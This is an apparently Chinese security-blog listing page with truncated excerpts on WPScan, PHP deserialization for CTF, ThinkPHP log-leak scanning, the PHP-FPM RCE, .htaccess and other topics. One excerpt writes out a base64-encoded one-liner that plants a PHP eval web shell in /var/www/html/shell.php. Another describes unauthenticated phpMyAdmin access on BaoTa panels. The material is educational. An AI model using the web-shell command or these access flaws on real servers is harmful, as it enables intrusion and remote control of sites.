2024-12-28 厉飞雨 阅读(226) 评论(0) 赞(9)

介绍 === WPScan是Kali Linux和parrot Linux都默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安全漏洞，其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞，并且支持最新版本的WordPress。值得注意的是，它不仅能够扫描类...

2024-12-28 厉飞雨 阅读(72) 评论(0) 赞(8)

<p>最近写了点反序列化的题，才疏学浅，希望对CTF新手有所帮助，有啥错误还请大师傅们批评指正。</p> <h2>php反序列化简单理解</h2> <p>首先我们需要理解什么是序列化，什么是反序列化？</p> <p>PHP序列化：serialize()</p> <p>序列...

2024-12-28 厉飞雨 阅读(125) 评论(0) 赞(8)

<h2>引言</h2> <p>什么是区块链？官方的解释是：区块链是一个分布式记账系统，是藉用密码学串接并保护其内容的串连交易记录（又称区块）。每一个区块包含了前一个区块的加密散列、对应的时间戳记以及交易数据（通常用默克尔树算法计算的散列值表示），这样的设计使得区块内容具有难以被篡改的特性。用区块链所串接的分布式账本能让两方有效率地纪录交易，且...

2024-12-28 厉飞雨 阅读(143) 评论(0) 赞(7)

<p>在 phpMyAdmin 中创建数据库 <code>moban0</code> 并设置密码的步骤如下：</p> <ol> <li> <p>登录 phpMyAdmin:</p> <ul> <li> <p>打开你的 phpMyAdmin 页面，通...

2024-12-28 厉飞雨 阅读(127) 评论(0) 赞(8)

<p>目前支持tp3和tp5日志泄露文件扫描</p> <p>近期还会持续更新，赏个star吧。</p> <p><img src="https://mmbiz.qpic.cn/sz_mmbiz_png/4PzD69su9gUUcMkFsEpUJ3uWpySSicPGCia7RIyFvRibLfYLUibC...

2024-12-28 厉飞雨 阅读(164) 评论(0) 赞(8)

<h2>php代码执行&amp;命令执行</h2> <h3>getshell</h3> <pre><code>echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d &gt; /var/www/html/shell.php <p&...

2024-12-28 厉飞雨 阅读(166) 评论(0) 赞(7)

<h1>前言</h1> <p>宝塔牛逼</p> <h1>影响版本</h1> <p>Linux面板7.4.2版本/Windows面板6.8版本</p> <h1>漏洞</h1> <p>由于phpmyadmin没加鉴权 访问IP:888/pma可直接登陆...

2024-12-28 厉飞雨 阅读(136) 评论(0) 赞(7)

<p><strong>0x00简介：</strong></p> <p>2019年10月22日在国外上某技术大牛公开了在PHP-FPM中新修补的RCE。</p> <p><strong>0x01漏洞评判：</strong></p> <p><str...

2024-12-28 厉飞雨 阅读(134) 评论(0) 赞(9)

<h1>原文地址:<a href="http://drops.wooyun.org/tips/3424">http://drops.wooyun.org/tips/3424</a></h1> <h2>0x00 背景</h2> <hr /> <p>这个估计很多同学看...

2024-12-28 厉飞雨 阅读(180) 评论(0) 赞(10)

<h3>0x00 .Htaccess简介</h3> <p>.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。</p> <p>平时开发用的最多的就是UR...